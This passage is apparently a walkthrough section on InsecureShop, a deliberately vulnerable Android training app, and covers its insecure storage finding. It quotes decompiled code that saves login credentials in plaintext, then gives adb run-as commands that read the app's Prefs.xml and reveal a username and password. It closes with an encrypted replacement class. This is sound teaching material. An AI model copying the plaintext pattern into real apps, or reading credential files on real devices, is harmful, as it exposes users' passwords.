😆 Vulnerability #3: Insecure Data Storage

If we go back to com.insecureshop.LoginActivity and analyze the code that runs after a successful login (lines 44-70 of the decompiled class), we see that it saves the username and password values, unencrypted, into the app's shared preferences.

Prefs prefs = Prefs.INSTANCE;
Context applicationContext = getApplicationContext();
Intrinsics.checkExpressionValueIsNotNull(applicationContext, "applicationContext");
// Username is written as-is to shared_prefs/Prefs.xml
prefs.getInstance(applicationContext).setUsername(username);
Prefs prefs2 = Prefs.INSTANCE;
Context applicationContext2 = getApplicationContext();
Intrinsics.checkExpressionValueIsNotNull(applicationContext2, "applicationContext");
// Password is written as-is to the same XML file, without any encryption
prefs2.getInstance(applicationContext2).setPassword(password);
Util.saveProductList$default(Util.INSTANCE, this, null, 2, null);
startActivity(new Intent(this, ProductListActivity.class));
return;

Proof of concept: because the app is debuggable, we can use run-as to switch to the application's UID and view the contents of its internal storage:

C:\Users\Aniket\Downloads\InsecureShop>adb shell
2026:/ $ run-as com.insecureshop
2026:/data/user/0/com.insecureshop $ ls -la
total 72
drwx------   7 u0_a478 u0_a478        4096 2022-04-06 10:38 .
drwxrwx--x 357 system  system        20480 2022-04-06 10:23 ..
drwxrwx--x   2 u0_a478 u0_a478        4096 2022-04-06 10:38 app_textures
drwx------   3 u0_a478 u0_a478        4096 2022-04-06 10:38 app_webview
drwxrws--x   4 u0_a478 u0_a478_cache  4096 2022-04-06 10:38 cache
drwxrws--x   2 u0_a478 u0_a478_cache  4096 2022-04-06 10:22 code_cache
drwxrwx--x   2 u0_a478 u0_a478        4096 2022-04-06 10:38 shared_prefs
2026:/data/user/0/com.insecureshop $ cd shared_prefs/
2026:/data/user/0/com.insecureshop/shared_prefs $ ls
Prefs.xml  WebViewChromiumPrefs.xml
2026:/data/user/0/com.insecureshop/shared_prefs $ cat Prefs.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="password">!ns3csh0p</string>
    <string name="productList">[{&quot;id&quot;:1,&quot;imageUrl&quot;:&quot;https://images.pexels.com/photos/7974/pexels-photo.jpg&quot;,&quot;name&quot;:&quot;Laptop&quot;,&quot;price&quot;:&quot;80&quot;,&quot;qty&quot;:0,&quot;rating&quot;:1,&quot;url&quot;:&quot;https://www.insecureshopapp.com&quot;},{&quot;id&quot;:2,&quot;imageUrl&quot;:&quot;https://images.pexels.com/photos/984619/pexels-photo-984619.jpeg&quot;,&quot;name&quot;:&quot;Hat&quot;,&quot;price&quot;:&quot;10&quot;,&quot;qty&quot;:0,&quot;rating&quot;:2,&quot;url&quot;:&quot;https://www.insecureshopapp.com&quot;},{&quot;id&quot;:3,&quot;imageUrl&quot;:&quot;https://images.pexels.com/photos/343720/pexels-photo-343720.jpeg&quot;,&quot;name&quot;:&quot;Sunglasses&quot;,&quot;price&quot;:&quot;10&quot;,&quot;qty&quot;:0,&quot;rating&quot;:4,&quot;url&quot;:&quot;https://www.insecureshopapp.com&quot;},{&quot;id&quot;:4,&quot;imageUrl&quot;:&quot;https://images.pexels.com/photos/277390/pexels-photo-277390.jpeg&quot;,&quot;name&quot;:&quot;Watch&quot;,&quot;price&quot;:&quot;30&quot;,&quot;qty&quot;:0,&quot;rating&quot;:4,&quot;url&quot;:&quot;https://www.insecureshopapp.com&quot;},{&quot;id&quot;:5,&quot;imageUrl&quot;:&quot;https://images.pexels.com/photos/225157/pexels-photo-225157.jpeg&quot;,&quot;name&quot;:&quot;Camera&quot;,&quot;price&quot;:&quot;40&quot;,&quot;qty&quot;:0,&quot;rating&quot;:2,&quot;url&quot;:&quot;https://www.insecureshopapp.com&quot;},{&quot;id&quot;:6,&quot;imageUrl&quot;:&quot;https://images.pexels.com/photos/264819/pexels-photo-264819.jpeg&quot;,&quot;name&quot;:&quot;Perfumes&quot;,&quot;price&quot;:&quot;10&quot;,&quot;qty&quot;:0,&quot;rating&quot;:2,&quot;url&quot;:&quot;https://www.insecureshopapp.com&quot;},{&quot;id&quot;:7,&quot;imageUrl&quot;:&quot;https://images.pexels.com/photos/532803/pexels-photo-532803.jpeg&quot;,&quot;name&quot;:&quot;Bagpack&quot;,&quot;price&quot;:&quot;20&quot;,&quot;qty&quot;:0,&quot;rating&quot;:2,&quot;url&quot;:&quot;https://www.insecureshopapp.com&quot;},{&quot;id&quot;:8,&quot;imageUrl&quot;:&quot;https://images.pexels.com/photos/789812/pexels-photo-789812.jpeg&quot;,&quot;name&quot;:&quot;Jacket&quot;,&quot;price&quot;:&quot;20&quot;,&quot;qty&quot;:0,&quot;rating&quot;:2,&quot;url&quot;:&quot;https://www.insecureshopapp.com&quot;}]</string>
    <string name="username">shopuser</string>
</map>
2026:/data/user/0/com.insecureshop/shared_prefs $

If you're using a rooted Android device, you can navigate directly to the app's internal storage directory without running the run-as command. The vulnerability could be avoided by encrypting the data before saving it.
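As an added example (not InsecureShop's own code), here is what an encrypted replacement for the Prefs helper looks like using the Jetpack Security library (androidx.security:security-crypto, assumed as a dependency); the class name SecurePrefs and the file name "secure_prefs" are hypothetical.

```java
import android.content.Context;
import android.content.SharedPreferences;
import androidx.security.crypto.EncryptedSharedPreferences;
import androidx.security.crypto.MasterKey;
import java.io.IOException;
import java.security.GeneralSecurityException;

// Hypothetical hardened counterpart to InsecureShop's Prefs helper.
// Keys and values are encrypted before they reach shared_prefs/secure_prefs.xml,
// so `run-as com.insecureshop cat shared_prefs/secure_prefs.xml` shows only
// ciphertext instead of "shopuser" / "!ns3csh0p".
public final class SecurePrefs {
    private static final String FILE = "secure_prefs"; // assumed file name
    private static final String KEY_USERNAME = "username";
    private static final String KEY_PASSWORD = "password";

    private final SharedPreferences prefs;

    public SecurePrefs(Context context) throws GeneralSecurityException, IOException {
        // The master key is generated in and never leaves the Android Keystore,
        // so it is not sitting next to the data in /data/user/0/<package>.
        MasterKey masterKey = new MasterKey.Builder(context)
                .setKeyScheme(MasterKey.KeyScheme.AES256_GCM)
                .build();
        prefs = EncryptedSharedPreferences.create(
                context,
                FILE,
                masterKey,
                EncryptedSharedPreferences.PrefKeyEncryptionScheme.AES256_SIV,
                EncryptedSharedPreferences.PrefValueEncryptionScheme.AES256_GCM);
    }

    public void setUsername(String username) {
        prefs.edit().putString(KEY_USERNAME, username).apply();
    }

    // Same API shape as the original setPassword, but the value is encrypted at
    // rest. Better still is to persist only a short-lived session token here and
    // never keep the password on the device at all.
    public void setPassword(String password) {
        prefs.edit().putString(KEY_PASSWORD, password).apply();
    }

    public String getUsername() { return prefs.getString(KEY_USERNAME, null); }
    public String getPassword() { return prefs.getString(KEY_PASSWORD, null); }
}
```

This closes the storage finding but not the debuggable-app one: a release build still needs android:debuggable unset (or false) so run-as is refused in the first place.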
